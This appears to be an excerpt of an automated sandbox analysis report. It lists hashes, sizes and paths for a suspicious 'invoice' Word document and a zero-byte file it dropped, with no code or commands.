Parent File C:\Users\aETAdzjz\Desktop\invoice D2493_392827307.doc
Mime Type text/xml
File Size 5.75 KB
MD5 6766f5ab19134623c3a42c9514a9b866 Copy to Clipboard
SHA1 b7efd878e5fc527a77d125b916c290b985d4671f Copy to Clipboard
SHA256 da16b52903fc96aa62172c02bda5532b3e6652cc1791fe887ae63b6060d9a6e0 Copy to Clipboard
SSDeep 96:vmlAKAzHLCswiZS6mmY+bzZliSwH2Ox/iZowIFe81qtsw3zT4J5whDtwKwa4An4b:sgmmY+ZsjFe81zwjJqh Copy to Clipboard
ImpHash None Copy to Clipboard
c:\users\aetadzjz\appdata\roaming\microsoft\forms\winword.box Dropped File Unknown
Not Queried
Mime Type -
File Size 0 Bytes
MD5 d41d8cd98f00b204e9800998ecf8427e Copy to Clipboard
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709 Copy to Clipboard
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 Copy to Clipboard
SSDeep 3:: Copy to Clipboard
ImpHash None Copy to Clipboard